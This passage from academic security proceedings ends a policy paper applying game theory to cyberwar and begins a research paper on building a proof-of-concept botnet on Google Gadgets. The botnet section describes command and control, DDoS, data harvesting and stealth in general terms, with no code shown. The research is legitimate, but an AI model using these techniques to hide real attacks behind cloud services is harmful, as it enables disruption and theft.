incentives not to divulge information about breaches (See, e.g., Gal-Or and Ghose 2004), there is an<br />
opaqueness about cybersecurity vulnerabilities which can produce misinformation. For instance, there<br />
has been a longstanding assumption that cyberattackers are exploiting unpatched computers after the<br />
patch has been released-- Internet security expert Eric Rescorla (2004) has even argued against<br />
disclosure and frequent patching for this reason. However, the latest Verizon data breach report does<br />
not support this: "In the past we have discussed a decreasing number of attacks that exploit software<br />
or system vulnerabilities versus those that exploit configuration weaknesses or functionality…[This<br />
year] there wasn‟t a single confirmed intrusion that exploited a patchable vulnerability” (2010: 29). In<br />
other words, as Verizon‟s 2009 Report stated, "vulnerabilities are certainly a problem contributing to<br />
data breaches but patching faster is not the solution” (2009:18).<br />
There is another concrete instance of misinformation in the “60 Minutes” video (2009) that claimed<br />
that the Brazilian powergrid was taken down by hackers. While the video met wide acceptance and<br />
generated apocalyptic fears, Bob Giesler, Vice President for Cyber Programs at SAIC, soon avowed<br />
the video to be “part of the dialogue that is absolutely wrong. The Brazilian powergrid dropped<br />
because of poor and faulty maintenance.” Giesler was corroborated when Wired Magazine (2009)<br />
reported that there was an investigation, and the blackout was “actually the result of a utility<br />
company‟s negligent maintenance of high voltage insulators on two transmission lines.”<br />
Misinformation about our cyber nemeses obscures analysis of policy needs and threat prioritization.<br />
Game theory cannot apply efficiently when we miscalculate or fail to identify those against whom we<br />
are playing.<br />
4. Moving from a linear to a biological model<br />
High reliance on private sector for cyber development means the DoD must use a customer-driven<br />
intelligence model, identifying needs and contracting for them. Yet competition for contracts does not<br />
occur in a perfectly competitive environment, and reliance upon it incorrectly presumes that the<br />
government has perfect information about their own needs and the risks of disclosing them. Umehara<br />
and Ohta (2009: 323) model transparency as a zero-sum game, and “assume that when a<br />
government agency makes a decision it knows the total amount of the potential damage." We may<br />
need to reevaluate the customer-driven intelligence model to find ways to harness more of the<br />
brainpower that exists not only in the private sector but also within the nonprofit, academic, and<br />
government domains—such as the working group that came together to face the Conficker virus<br />
challenge (See Moscaritolo 2009).<br />
Similarly, there are “weapons” confronting the DoD in the cyber arena that do not come from<br />
traditional or foreign enemies, such as the Wikileaks disclosures. As Giesler (2009) phrased it, “The<br />
challenge to the government is: how do you harness that decentralized, netcentric organism? How do<br />
you enable the ecosystem's antibodies to react to these things as opposed to regulating and breaking<br />
it down? How do you nurture that reaction?” This decentralized power emerged in the response to<br />
Pakistan blocking Youtube-- as Jonathan Zittrain (2009) reminds, this was a crisis to which NANOG,<br />
“an informal network of nerds, some of whom work for various ISPs,” promptly responded.<br />
Cyberwar strategy requires us to think outside of a linear security-investment frame of mind toward<br />
weapons development. The most accurate model of cyber threat appears to one that is biological—<br />
specifically, one that is epidemiological— in its response to invasion. In the case of the Estonian<br />
cyberattacks, Giesler (2009) offers as example, “it was the banking sector, it was the tellco sector that<br />
responded,” and “I started to think „Maybe that's the right model. This stuff is so decentralized, the<br />
problem is so pervasive and so fast…how you organize around a problem will dictate how you solve it<br />
and it requires a lot more dialogue.” The Department of Defense has recognized this interweaving of<br />
capabilities and data, and released the more oblique statement, “We are in the Age of<br />
Interdependence, out of the Information Age” (DoD 2009 Vision <strong>Conference</strong>).<br />
26
Merritt Baer<br />
Effective cyberintrusion defenses analog the epidemiological model for responding to an invader.<br />
Some have warned of a “cyber pearl harbor”; this seems too kinetic-world to form an accurate<br />
description of the threat. As Giesler asserts, we ought to be talking about cyber-destruction like a<br />
cancer—“you already have it, it‟s hard to detect, it may be fatal but it‟s also treatable.” It may be that<br />
the best responses to cyberwar are not found by studying war—at least not the ones in our history<br />
books involving cannons or tanks.<br />
Similarly, rather than a process of continual growth, cyber evolution, like biological evolution, seems<br />
more aptly characterized as punctuated equilibrium—fairly long periods of relative stasis followed by<br />
quick, drastic periods of breakthrough. (An example of a breakthrough in the cyber context could be<br />
the advent of cloud computing.) Correspondingly, one of the reasons why reaching Nash equilibrium<br />
is unlikely in the cyberwar context is that it under unstable conditions, evolutionarily stable strategies<br />
don‟t run a typical course. As evolutionary biologist Klaus Rohde (2005: Appendix 3) writes, “frequent<br />
and drastic abiotic and biotic changes in the environment which affect the fitness (reproductive<br />
success) of potential contestants in evolutionary „games,‟ will make it more difficult to establish<br />
evolutionary stable strategies, because the establishment of an ESS cannot keep up with the<br />
changes.” Because cyber evolution is not linear but organic, it forces us to treat it according to the<br />
economics of biology. The DNI‟s “Vision 2015” report addresses the deliverables aspect of this: “We<br />
cannot evolve into the next technology „S curve‟ incrementally; we need a revolutionary approach.<br />
Breakthrough innovation, disruptive technologies, and rapid transition to end-users will be required…”<br />
Applying game theory to cyberwarfare strategy allows us to make predictions that transcend lockstep<br />
models, that change based on resources, and that take into account other players‟ strategies and<br />
environmental conditions. Thus, while there is no solution nor even an accurate map of potential<br />
moves in game theory, it seems yet to be our best tool for transcending the perpetual reactiveness<br />
that has characterized cyber- information security efforts.<br />
5. Uses of game theory<br />
5.1 Layered defense<br />
While cyberwar strategy is a game of imperfect information, there are always choices available, and<br />
the vulnerabilities associated with each choice are not random but are often knowable or predictable,<br />
at least to some extent. We know that the risks of using open-source materials are in its lack of<br />
restriction; we know that the weakness that comes from use of highly classified, air-gapped (or in<br />
Zittrain-speak, “tethered”), networks come from a loss of functionality and “generativity.” Diversity and<br />
interoperability are tradeoffs, as are embrittlement and toughening. These are zero-sum games; but<br />
the overall strategy is not. While one can not create a network that is maximally resistant to random<br />
faults and maximally resistant to targeted faults, one can take into account the particular weaknesses<br />
and likelihoods of attack so that the weaknesses overlap in resistant ways-- ways that correspond to<br />
risk preferences and security priorities. As the banking and credit card systems have worked to create<br />
overall robustness through non-overlapping weaknesses, other providers (including infrastructural)<br />
should be able to create calculated layers of defense if there were coordination and appropriate<br />
budgeting.<br />
5.2 Identifying nodes robustly<br />
In game theory, the identification of possible choices is termed alpha-beta pruning—there is not an<br />
unlimited number of desirable outcomes therefore there is not an unlimited number of choices. One<br />
can prune down the number of nodes evaluated in the search tree. Alpha-beta pruning represents the<br />
fact that as soon as one move can be proven less desirable than another, it need not be further<br />
evaluated. One‟s search can then steer toward the more promising subtree(s), creating an optimal<br />
search path.<br />
To do this effectively first requires diversity and creativity—that is, the ability to identify many possible<br />
nodes. Defense Secretary Robert Gates stated that the Pentagon is “desperately short of people who<br />
have capabilities (defensive and offensive cybersecurity war skills) in all the services and we have to<br />
address it.” (Booz Allen 2009: 1). The key human-side aspect of cyberwar strategy is to effectively<br />
uncover all possible decision paths, which requires foundationally that the Department of Defense do<br />
a more effective job of recruiting and retaining diverse talent.<br />
27
Merritt Baer<br />
Identifying new nodes also requires a model that takes into account the creative possibilities that exist<br />
in the cyber world (which do not exist as concretely in, for example, the nuclear world) for moves that<br />
serve what biological models call “posturing”— flexing muscles to show capability rather than to enact<br />
any immediate goal. Species which posture rather than fight tend to compete via a “war of attrition.”<br />
Applying this to international security reveals that there are more available cyberwar decision paths<br />
than those which enact straightforward violence. As Rohde (2010) stated, taking into account<br />
posturing is useful because it accounts for different forms of power on the changing landscape in<br />
which the competition occurs. Rohde explains, “Climate change, for example, may have unforeseen<br />
consequences for how nations behave: a war of attrition may become more aggressive.” This game<br />
cannot be modeled linearly based on how many canons or bombs a country has stockpiled; actual<br />
capabilities may be less or more than those the country chooses to posture. (See, e.g., Woodward<br />
2010 on the “speculative” possibility that Stuxnet was an Israeli attack on an Iranian target.) Cyberwar<br />
posturing requires a model more nuanced than M.A.D. To fully exploit the potential for modeling game<br />
theoretical strategies, we must recruit diverse minds to think up new possible nodes, and validate<br />
different forms of power to determine what strategies serve the end goal.<br />
5.3 Weighting nodes intelligently<br />
Once one isolates the problem and defines the corresponding set of goals in a given situation, one<br />
must evaluate the other players‟ likely moves. Game theory can play an important role at this stage<br />
because it is well-established that human cognition tends not to react to threats in a fully rational way,<br />
or as economics would dictate. Jonathan Renshon and Nobel Prize winner Daniel Kahneman have<br />
written on these human cognitive obstacles to economically-optimal decisions. According to<br />
Kahneman and Renshon (2006), “humans cannot make the rational calculations required by<br />
conventional economics. They rather tend to take mental shortcuts that may lead to erroneous<br />
predictions, i.e., they are biased.” Using game theory to make a security strategy that is a calculated<br />
derivative of mapped potential outcomes allows decisionmakers to lessen those biases and respond<br />
to threats proportionately/economically.<br />
The fact that there are limited existing examples of cyberwarfare interactions complicates this stage of<br />
analysis—successful programming in games like chess and Othello have relied upon finite patterns of<br />
previous actions: “A hill climbing algorithm can… be used based on a function of the number of<br />
correct opponent move predictions taken from a list of previous opponent moves or games.” (Hamilton<br />
et al., 2002: 4). Lack of behavioral precedent models will increase the margin of error—if one could<br />
use a killer heuristic (prioritizing moves that have been shown to produce cutoff in other situations),<br />
the pruning would be more successful. (Winands 2004). It is possible that red-teaming could provide<br />
some approximations of history—indeed, one of the recommendations in the Report of the Defense<br />
Science Board (2010: viii) is to “establish red teaming as the norm instead of the exception.” And all<br />
players must play on the board of limited empirical history.<br />
In an intersecting sense, the uses of game theory in assigning weight neutrally to nodes of a decision<br />
tree may be especially useful in the cyber context because our reactions seem to derive from<br />
evolutionary strategies, and cyber may activate those uniquely. Having a "face" to the threat is crucial<br />
to our reaction, according to psychologist Daniel Gilbert (2007) who offers as example that global<br />
warming does not push our buttons like terrorism and other threats "with a mustache" do (think of the<br />
resources we devote to deaths by terrorism, compared to deaths by cancer or hunger). Cyberwar has<br />
a degree of sanitation to it—unlike bombs and tanks, it does not necessitate face-to-face<br />
confrontation with the effects of one‟s decisions. (See Baer 2010b).<br />
6. Avoiding cyberwar: Could we have cyber disarmarment?<br />
The economic inefficiencies of an offensive cyber arms race (not to mention the danger of allowing<br />
the US and others to stockpile a cyber arsenal) have led some to propose solutions to avoid this<br />
altogether. Harvard Professor Jack Goldsmith (2010) has proposed something akin to an international<br />
negotiating architecture to preempt cyberwar and the costs of cyberdefense. Certainly, the U.S. would<br />
benefit from having red lines drawn. But even if we could have the prescience to create a sense of<br />
rules that would anticipate the new ways in which the Internet will be useful for attack (which is<br />
unlikely given the range of possibilities, many of which might not be directly violent— “the range of<br />
possible options is very large, so that cyberattack-based operations might be set in motion to<br />
influence an election, instigate conflict between political factions, harass disfavored leaders or entities,<br />
or divert money.”-- National Research Council Committee on Offensive Information Warfare Section<br />
28
Merritt Baer<br />
1.5), there seems to be no way to guarantee China‟s (or North Korea‟s or Russia‟s) compliance<br />
unless there are some enforcement machineries, and some remedies in instances of transgression.<br />
Cheating seems almost assured considering that, for instance, North Korea continually reneges on its<br />
nuclear negotiations, and cyber disarmament would be pragmatically much easier to cheat.<br />
Even if we could get a global cyber-enforcement organization in place, cyber attribution problems<br />
would allow for rogue states (let alone non-nation-state actors which have no real duty to comply and<br />
are harder to retaliate against) to act outside of the red tape. Defectors could get a comparative<br />
advantage by cheating (think to the classic prisoners‟ dilemma, in which defecting is always the<br />
optimal strategy even though it doesn‟t produce optimal outcome overall), and could do it remotely<br />
through US computers, as in the Estonia attack. For a disarmament agreement to be enforceable<br />
would require a change in the Internet architecture in the sense of decreasing anonymity or some<br />
other sea change to incentivize compliance. One could impose sanctions on nations that allow attacks<br />
to happen-- but this strict liability regime would confront practical problems: finding accurate attribution<br />
is difficult and in fact, the latest numbers reflect more botnet-appropriated computers in the U.S. than<br />
anywhere else (Prince 2010). Establishing cyber rules and then not being able to enforce them<br />
because of attribution problems could be embarrassing.<br />
Moreover, like nuclear war game theory, cyberwar game theory decision paths are complicated by the<br />
fact that there are differences in risk tolerance among players. Thus, while “the usual assumption is<br />
that an opponent evaluation function uses a subset of the heuristics in our own evaluation function,<br />
with different weights” (Hamilton et al. 2002: 4), the heuristics of cyber players may vary dramatically,<br />
especially in interactions between countries with generally greater risk tolerance regimes in<br />
government. Since “players' decisions are optimally based not only on their own cost functions (which<br />
each knows) but also on their opponent's cost structure (which is known only in probability)”<br />
(McCormick and Owen 2006), we cannot assume that our incentives for desiring disarmament match<br />
other players‟.<br />
Larger values-based issues require us to evaluate what kind of behavior we find acceptable online<br />
and what is a violation of international ethics or human rights. This is part of a dialogue that needs to<br />
occur before a legal framework can enforce it. As I have written, we all have a stake in this<br />
determination (Baer 2010a). The purpose of this paper, however, was the strategic possibilities and<br />
not the broader development of a code of human rights online.<br />
7. Conclusions<br />
Game theory is not a panacea. As I have described, cyberwarfare defies a number of common game<br />
theoretic assumptions. However, it is worth exploring game theory‟s applications to cyberwarfare<br />
strategy because game theory lends itself to viewing larger patterns, and approaching problems<br />
holistically. In cyber, the lines between fighting and research melt away, and the computer scientists<br />
mobilizing the tools to wage cyberwar look more like Mozart or Einstein than Napoleon. Following the<br />
symmetries that occur in the natural world, the responses of epidemiology and the growth patterns of<br />
evolutionary biology, game theory allows us to gauge efficacy in a non-linear dimension. Many<br />
experts have compared cyberwar strategy to kinetic-world models, from nuclear strategy (Chertoff, in<br />
Espiner 2010) to air warfare strategy (Baker 2010). I find that kinetic-world models of warfare fall short<br />
of describing the problem of cyberwarfare or its possible treatments. There is no real winning in<br />
cyberwar; there is continual reorientation.<br />
Game theory, worked upon a biological model, holds promise for cyberwar strategy because it<br />
transcends linear models that assume aspects of the landscape to be fixed. Cyberwarfare is delicate<br />
but not haphazard, and game theory can lead decisions that address true threats by avoiding human<br />
bias. If we maintain a robust workforce, game theory can also allow decisionmakers to identify<br />
emerging nodes on the decision tree. In an occam‟s razor sense, it may be that to anticipate the curve<br />
in the cyberwarfare game, we ought to return to the simple beauty of early programming, when the<br />
Internet was unmolded, an organic cell of potential energy. Cyber development eludes kinetic-world<br />
models because it is not just about harnessing power, it is about creating new pockets of utility and<br />
exploiting them in creative ways.<br />
Acknowledgements<br />
Thanks to Professor Jack Goldsmith for the opportunity to write a first version of this research in<br />
seminar and for the exposure to many of cyberwarfare‟s leading minds.<br />
29
References<br />
Merritt Baer<br />
Anderson, R. and Moore, T. (2006) “The Economics of Information Security,” Science Vol. 314 No. 5799, pp.<br />
610-613.<br />
Arnold, S. A., et al. (2009) "Can Profit Policy and Contract Incentives Improve Defense Contract Outcomes?"<br />
Institute for Defense Analyses, Washington, DC.<br />
Baer, M. (2010a) “Cyberstalking, and the Internet Landscape We Have Constructed.” Virginia Journal of Law and<br />
Technology 154 Vol. 15, No. 2.<br />
-- (2010b) “Cyber Attacks & the Ethical Dimension of the Google China Episode,” [online], Global Comment,<br />
http://globalcomment.com/2010/cyber-attacks-the-ethical-dimension-of-the-google-china-episode/<br />
Baker, S. (2010) “Cyberwar: What is it Good For?” ABA 20 th Annual Review of the Field of National Security Law,<br />
Washington, DC.<br />
Baram, M. (2009) “Wasteful Spending by Private Contractors in Afghanistan Climbs to $1 Billion, as their<br />
Numbers Multiply,” Huffington Post.<br />
Booz Allen Hamilton (2009) “Cyber In-Security: Strengthening the Federal Cybersecurity Workforce,” [online],<br />
http://www.ourpublicservice.org/OPS/publications/viewcontentdetails.php?id=135<br />
Calbreath, D. (2005) "MZM Scandal Illuminates Defense Contract Tactics," [online], Sign on San Diego,<br />
http://archives.signonsandiego.com/news/politics/cunningham/20050821-87-mzmscand.html<br />
Carney, J. (2010) “The War Against Wikileaks is Worse than Wikileaks,” [online], CNBC,<br />
http://www.cnbc.com/id/40551046/<br />
CBS News (2009) “Cyber War: Sabotaging the System” 60 Minutes,<br />
http://www.cbsnews.com/stories/2009/11/06/60minutes/main5555565_page1.shtml?tag=contentMain;conte<br />
ntBody<br />
Charney, S. (2009) “Reviewing the Federal Cybersecurity Mission,” Testimony Before the U.S. House Committee<br />
on Homeland Security Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology,<br />
Washington, DC.<br />
Clockbackward (2009) “Does Beauty Equal Truth in Physics and Math?” [online], Clockbackward Essays,<br />
http://www.clockbackward.com/2009/03/11/does-beauty-equal-truth-in-physics-and-math/<br />
DoD 45 th Annual Federal Forecast (2009) Department of Defense Special Topic Cyber Security: TechAmerica<br />
2009 Vision <strong>Conference</strong>, Washington, DC.<br />
Director of National Intelligence, “Vision 2015: A Globally Networked and Integrated Intelligence Enterprise,”<br />
[online], HYPERLINKhttp://www.dni.gov/Vision_2015.pdf<br />
Espiner, T. (2010) “Chertoff Advances Cyber Cold War,” [online], ZDNet UK<br />
http://www.zdnet.co.uk/news/security-threats/2010/10/14/chertoff-advocates-cyber-cold-war-40090538/<br />
Gal-Or, E. and Ghose, A. (2004), “The Economic Consequences of Sharing Security Information,” Economics of<br />
Information Security, Vol. 12, pp. 95-104.<br />
GAO Report to Congressional Committees (2009) "Defense Acquisitions: Assessments of Selected Weapons<br />
Plans," [online], http://www.gao.gov/new.items/d09326sp.pdf<br />
Geer, D., Jr., Sc.D. (2010) “Cybersecurity and National Policy,” Harvard National Security Journal, Vol. 1.<br />
Giesler, R. (2009) personal conversation with the author.<br />
Gilbert, D. (2007) “If Only Gay Sex Caused Global Warming,” Huffington Post.<br />
Goldsmith, J. (2010) “Can We Stop the Global Cyber Arms Race?” Washington Post.<br />
Hathaway, M. (2009) “Strategic Advantage: Why America Should Care About Cybersecurity,” Harvard Kennedy<br />
School, Cambridge, MA.<br />
Hamilton, S.N., Miller, W.L., Ott, A., and Saydjari, O.S. (2002) The Role of Game Theory in Information Warfare,<br />
and Challenges in Applying Game Theory to the Domain of Information Warfare, Fourth Information<br />
Survivability Workshop ISW-2001/2002, Vancouver, BC Canada<br />
Winands, M.H.M. (2004) “Informed Search in Complex Games,” Datawyse b.v., Maastricht, The Netherlands.<br />
Jamakka, J. and Mölsä, J.V.E. (2005) “Modeling Information Warfare as a Game,” Journal of Information Warfare<br />
Vol. 4, No. 2, pp. 12-25.<br />
Kahneman, D. and Renshon, J. (2006) “Why Hawks Win.” Foreign Policy.<br />
http://www.foreignpolicy.com/articles/2006/12/27/why_hawks_win<br />
Libicki, M. (1995) What is Information Warfare? National Defense University, Washington, DC.<br />
McCormick, G. H. and Owen, G. (2006) "A Game Model of Counterproliferation, with Multiple Entrants,"<br />
International Game Theory Review, Vol. 8, No. 3, pp. 339-353.<br />
Moscaritolo, A. (2009) “Industry Collaboration: Drumming Up Defenses,” SC Magazine.<br />
MSNBC (2007) “Defense Dept. warns about Canadian spy coins,” [online],<br />
http://www.msnbc.msn.com/id/16572783/<br />
National Research Council Committee on Offensive Information Warfare (2009) “Technology, Policy, Law and<br />
Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities,” The National Academies Press,<br />
Washington, DC.<br />
http://www.abanet.org/natsecurity/cybersecurity_readings/1final_report_cyberattack_nasnae.pdf<br />
Prince, B. (2010) “Microsoft: U.S. Home to Most Botnet PCs,” eWeek [online]<br />
http://www.eweek.com/c/a/Security/Microsoft-US-Home-to-Most-Botnet-PCs-216614/<br />
Project Honey Pot, (2009) “Our 1 Billionth Spam Message” [online]<br />
http://www.projecthoneypot.org/1_billionth_spam_message_stats.php<br />
30
Merritt Baer<br />
Report of the Defense Science Board (2010), “Capability Surprise,” [online],<br />
http://www.acq.osd.mil/dsb/reports/ADA506396.pdf<br />
Rescorla, E. (2004) “Is Finding Security Holes a Good Idea?” Third Workshop on the Economics of Information<br />
Security, Minneapolis, MN.<br />
Reuters (2010) “Wikileaks Battle: A New Amateur Face of Cyber War?” CNBC<br />
Rhode, Klaus (2005) Nonequilibrium Ecology. Cambridge University Press, Cambridge, MA.<br />
-- [online] “Games Theory (Nash Equilibria) in International Conflicts,” http://knol.google.com/k/games-theorynash-equilibria-in-international-conflicts#<br />
Saydjari, O.S. (2004) “Cyber Defense: Art to Science,” Communications of the ACM Vol. 47, No. 3 pp. 52-57.<br />
Schavland, J., Chan, Y., and Raines, R.A. (2009), “Information Security: Designing a Stochastic-Network for<br />
Throughput and Reliability.” Naval Research Logistics Vol. 56, No. 7, pp. 625-641.<br />
Shapcott, Brad “Economics Proverbs,” [online], CEO Magazine<br />
http://ceomagazine.biz/hrmproverbs/economicsproverbs.htm<br />
Shen, D., Chen, G., Haynes, L.S., Cruz, J.B., Kruger, M. and Blasch, E. (2007) “A Markov Game Approach to<br />
Cyber Security,” [online], SPIE Newsroom, "https://spie.org/x15400.xml?ArticleID=x15400"<br />
https://spie.org/x15400.xml?ArticleID=x15400<br />
Shofield, J. (2008) “It‟s Every Man for Himself,” The Guardian.<br />
Sills, M. (2009) “ULL gets Air Force contract: Researchers to develop preemptive cyber security strategies,” The<br />
Advocate [online] http://www.2theadvocate.com/news/79589152.html?c=1287843989513<br />
Soares, M. (2009) “Brazilian Blackout Traced to Sooty Insulators, Not Hackers,” Wired Magazine.<br />
Spring, B. “Nuclear Games: A Tool for Examining Nuclear Stability in a Proliferated Setting,” [online],<br />
http://www.heritage.org/Research/nationalSecurity/upload/hl_1066.pdf<br />
Umehara, E. and Ohta, T. (2009) “Using Game Theory to Investigate Risk Information Disclosure by Government<br />
Agencies and Satisfying the Public—the Role of the Guardian Agent," Systems, Man and Cybernetics, Part<br />
A: IEEE Transactions on Systems and Humans Vol. 39, No. 2, pp. 321-330.<br />
Verizon 2009 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />
http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/<br />
Verizon 2010 Data Breach Investigations Report, [online], Verizon Business Security Solutions,<br />
http://www.verizonbusiness.com/resources/reports/rp_2010-data-breach-report_en_xg.pdf<br />
Wilson, C. (2008) “Botnets, Cybercrime, and Cyberterrorism: Vulnerabilities and Policy Issues for Congress”<br />
Congressional Research Service Order Code RL32114, Washington, DC.<br />
Woodward, P. (2010) “Stuxnet: the Trinity Test of Cyberwarfare,” War in Context [online]<br />
http://warincontext.org/2010/09/23/stuxnet-the-trinity-test-of-cyberwarfare/<br />
Zittrain, J., Lord, Lt. Gen. W., Geer, D., (2010) Cybercrime and Cyberwarfare class, Harvard Law School.<br />
Zittrain, J. (2008) The Future of the Internet—and How to Stop It. Yale University Press, New Haven, CT.<br />
-- (2009) “The Web as Random Acts of Kindness” [online video]<br />
http://www.ted.com/talks/jonathan_zittrain_the_web_is_a_random_act_of_kindness.html<br />
31
Who Needs a Botnet if you Have Google?<br />
Ivan Burke and Renier van Heerden<br />
Council for Scientific and Industrial Research, Pretoria South Africa<br />
IBurke@csir.co.za<br />
RvHeerden@csir.co.za<br />
Abstract: Botnets have become a growing threat to networked operations in recent years. They disrupt services<br />
and communications of vital systems. This paper, gives an overview of the basic anatomy of a Botnet and its<br />
modus operandi. In this paper, we present a Proof of Concept of how Google gadgets may be exploited to<br />
achieve these basic components of a Botnet. We do not provide a full fledged Botnet implementation but merely<br />
to mimic its functionality through Google Gadget API. Our goal was to have Google act as proxy agent to mask<br />
our attack sources, establish Command and Control structure between Bots and Botherders, launch attacks and<br />
gather info while at the same time maintaining some degree of stealth as to not be detected by users.<br />
Keywords: Botnet; Google Gadget; Command and Control; DDoS<br />
1. Introduction<br />
A Botnet is a collection of compromised computers or agents that are infected by malware. These<br />
agents use sophisticated command and control techniques to execute complex and distributed<br />
network attacks. Agents are usually unaware that they have been compromised and are partaking in<br />
these attacks. They are often controlled by an external agent known as Botherders or master agents<br />
(Banks 2007, Vamosi 2008).<br />
According to Steward (in Vamosi, 2008), the techniques used by large Botnets such as Storm are<br />
available online, but a Botnet is more than the sum of its parts. What makes a Botnet successful is<br />
combining all these components into a coherent structure.<br />
Stracener states in (Stracener, 2008), that future malware will run on the internet instead of<br />
standalone computers. His premise is that, as the modern computer infrastructure moves closer to a<br />
networked cluster or cloud so too will the threats to these infrastructures. He warns of his concerns<br />
about malicious gadget and key vulnerabilities related to gadgets. A study conducted by WorkLight<br />
Inc. (in MacManus, 2008), found that 48% of internet bank users, ages 18-34, would use secure thirdparty<br />
Web 2.0 gadgets for their personal banking, if their banks did not provide them with such<br />
functionality. This would imply the users would be able to make a informed decision about what it<br />
means to identify a Web 2.0 gadget as being secure.<br />
Stracener's concerns are mimicked by The Cloud Security Alliance in their paper (Hubbard et al.,<br />
2010). They identify seven key threats to Cloud computing security:<br />
Abuse and nefarious use of cloud computing<br />
Insecure interfaces and APIs<br />
Malicious insiders<br />
Shared technology issues<br />
Data loss or leakage<br />
Count or service hijacking<br />
Unknown risk profile<br />
In this paper we demonstrate a rudimentary Botnet construct by exploiting Google services to host our<br />
Botnet. We investigate the core components of a Botnet and then attempt to mimic the components<br />
using Google Gadget API. It is not the goal of this paper to illustrate the weaknesses in a specific API<br />
but rather to illustrate the danger of user generated content on the World Wide Web. Our aim is to<br />
proof that online services can be organized into a botnet like structure.<br />
Google Gadgets API is design for rapid development of small web based utility applications such as:<br />
calendars, currency converters and news feed readers (Peterson, 2009). By including Open Social<br />
API to a Google gadget, one can enhance shared gadget interaction and extend one’s gadget to the<br />
Social Media domain.<br />
32
Ivan Burke and Renier van Heerden<br />
Flaws in Google Gadgets have been demonstrated by Barth et al. (2009). They noted that JavaScript<br />
can lead to exploitation. These vulnerabilities include session sharing vulnerabilities which enable<br />
Cross-Site Scripting (XSS) and malicious redirects to Man-in-the-middle attacks. Google has been<br />
reluctant to fix some of these vulnerabilities since 2004. (Robert 2008)<br />
In Section 2, we investigate the composition of a basic Botnet. In Section 3, we describe our attempt<br />
at mimicking these components. In Section 4, we discuss our Botnet model. In Section 5, we propose<br />
possible future application of this work. In Section 6, we discuss our conclusion and possible means<br />
of stopping these types of Botnets.<br />
2. Anatomy of a botnet<br />
Botnets tend to share communalities in their structure and design. In this Section, we describe the<br />
common components of a Botnet as well as their role within the Botnet.<br />
Figure 1: Anatomy of a Botnet<br />
2.1 Command and control component<br />
A large part of a Botnet’s success can be attributed to its ability to execute large, synchronized,<br />
distributed attacks. This would require sophisticated command and control (C2) structures to coordinate<br />
these attacks (Banks 2007, Ollmann, 2009).<br />
Communication channels usually relay herder instructions, such as commands to execute on remote<br />
PC. Bots use channels to send back retrieved data such as key logger information or command<br />
response information. These communications need to be covert in order to hide the Botnet activities.<br />
Over the years several covert channels have been used to communicate commands between Bot and<br />
Botherder such as Twitter, Internet Relay Chat (IRC) and Instant Messages. Several advance C2<br />
techniques such as steganography or social media sites to hide Botnet communication in plain sight.<br />
Next we look at the types of attacks that could be executed by Botnots (Ollmann, 2009)<br />
33
2.2 Attack vector<br />
Ivan Burke and Renier van Heerden<br />
Botnets are usually goal orientated. For the most part their goal is either profit or service disruption.<br />
There are several means of achieving these goals using botnets. In this Section, we discuss some<br />
attacks commonly used by Botnets.<br />
2.2.1 Distributed denial of service attack<br />
Due to Botnet size and the distributed nature of Botnets, Distributed Denial of Service attacks (DDoS)<br />
are a popular form of attack (Felix et al., 2005). In this attack the Botherders issue a command to all<br />
its subordinate Bots to connect to a targeted system at the same time. The targeted system can<br />
usually not handle the sudden influx of requests and which cause system services to be temporarily<br />
disrupted. Botherder rent out these services to competitors to disrupt competitor services (Kiefer,<br />
2004).<br />
2.2.2 Spam relay<br />
The first generation of Botnets where reliant on email to spread and infect various hosts. Botnets<br />
would open a SOCKS v4/v5 proxy on compromised machines, allowing it to send spam at the request<br />
of the Botherder. Botnets also harvested email addresses from infected hosts to add to its spam lists.<br />
(Engate, 2009)<br />
2.2.3 Data harvesting<br />
Botnets report back valuable system information to Botherders. This information can include key<br />
stroke logs, system vulnerabilities, service availability on host machine, open port data and network<br />
traffic. Botherders collect and collate this data to retrieve data such as user names and passwords<br />
which could be used for mass identity theft. Botnets scan for system weakness that could possibly be<br />
exploited at a later stage if Botnet functionality is compromised in future. By sniffing network traffic<br />
Botnets could become aware of rival Botnets infecting host PCs and disrupt these rival Botnet<br />
functionality.<br />
2.2.4 Ad serve abuse<br />
Botnets can be utilized for monetary gain. Botnets can be used to exploit the Pay Per Click or<br />
Impression Based internet advertising models. By forcing infected machines onto ad serve sites or<br />
using iFrames to fool users into clicking on advertisements, Botherdes can generate revenue from<br />
marketing companies.<br />
Botherders infect host PC with browser add-ons, Browser Helper Objects (BHO), or browser<br />
extensions which changes user browser interaction to relay them to ad serve sites or simply generate<br />
brows requests to ad serve sites automatically. These Add-ons can serve a dual purpose, as it can<br />
collect user data from browser and relay it to Botherder.<br />
2.3 Viral capability<br />
One of the great strengths of a Botnet is its sheer size. This also makes Botnets so tough to take<br />
down. Hence it is essential for a Botnet to spread fast and to vastly distributed systems.<br />
The first generation of Botnets where primarily reliant on email and malicious page redirects to<br />
spread. Modern Botnets such as Asprox, Koobface, Zhelatin and Kreios C2 spread via social media<br />
(Denis, 2008) (Eston, 2010). The Botnet posts users content on social networks sites which infect any<br />
user that follows the malicious links. Some Botnets have been known to hide within popular trusted<br />
applications. Trojans drop malicious code in trusted address spaces and exploits weaknesses in<br />
hosts PC to compromise it and make it part of Botnet network.<br />
2.4 Stealth component<br />
Botnets are only useful as long as they are not detected. Hence stealth is a fundamental requirement<br />
for all Botnets.<br />
It is the opinion of the researchers that stealth is required in each of the components previously<br />
identified in this section. If communications are noisy, infected host might become aware of malicious<br />
34
Ivan Burke and Renier van Heerden<br />
activity and firewalls or intrusion detection systems might block communications. If attack is disruptive,<br />
anti-virus companies will detect and block the attack. Mechanisms used to spread Botnets must seem<br />
organic and natural for it to be affective. It is the combination of these requirements that make Botnets<br />
so difficult to construct and maintain.<br />
In the next section we our attempt at constructing these components using Google Gadgets API.<br />
3. Attempt at constricting a botnet<br />
In this Section, we will discuss our attempt to create a proof of concept Botnet; At first we look at<br />
cloud computing as a whole and then more specifically using Google Gadgets API we investigate the<br />
possibility of using Cloud computing to mimic the attack components of a Botnet, as presented in<br />
Section 2. It is important to note that, this paper is not just specifically targeted towards exposing<br />
Google API weaknesses but to illustrate the dangers of user generated content and cloud computing<br />
on the World Wide Web.<br />
According to Garner (Garner, 2008), cloud computing can be defined as style of computing whereby<br />
IT-related capabilities are provided as a service using Internet technologies to connect to multiple<br />
customers. Botnets have already been found using popular cloud such as Amazon's EC2 as a<br />
Command and Control unit (Goodin, 2009). In a report compiled by The Cloud Security Alliance,<br />
seven types of security threats where identified (Hubbard et al., 2010). Of these seven, we focused on<br />
